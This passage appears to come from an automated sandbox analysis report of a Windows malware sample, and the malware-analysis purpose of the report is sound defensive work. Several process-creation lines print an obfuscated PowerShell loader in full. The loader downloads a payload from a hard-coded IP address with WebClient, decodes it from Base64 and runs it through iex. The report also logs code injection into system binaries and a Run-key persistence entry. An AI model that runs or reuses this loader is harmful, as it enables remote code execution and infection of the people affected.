lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348B78FB push ebx; retf 2_2_00007FFD348B796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348B7958 push ebx; retf 2_2_00007FFD348B796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348B00BD pushad ; iretd 2_2_00007FFD348B00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD349871C8 push esp; retf 2_2_00007FFD349871C9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_074B08D8 push eax; mov dword ptr [esp], ecx5_2_074B0AC4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA09AD push ecx; mov dword ptr [esp], ecx10_2_1FDA09B6
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_034709AD push ecx; mov dword ptr [esp], ecx13_2_034709B6
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D04220 push ds; iretd 13_2_02D04248
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D09028 push cs; iretd 13_2_02D0902A
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D0A68E push edx; iretd 13_2_02D0A6BC
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CFE655 push cs; retf 13_2_02CFE68F
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CFE660 push cs; retf 13_2_02CFE68F
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CF778D push ds; iretd 13_2_02CF778F
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D0F58B pushfd ; ret 13_2_02D0F58C
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D0CE5F push ds; retf 13_2_02D0CE69
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02CF3F9E push ecx; retf 13_2_02CF3FA9
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D09C45 push cs; retf 13_2_02D09C4F
        Source: C:\Windows\SysWOW64\recover.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run T61TH2R0Jump to behavior
        Source: C:\Windows\SysWOW64\recover.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run T61TH2R0Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
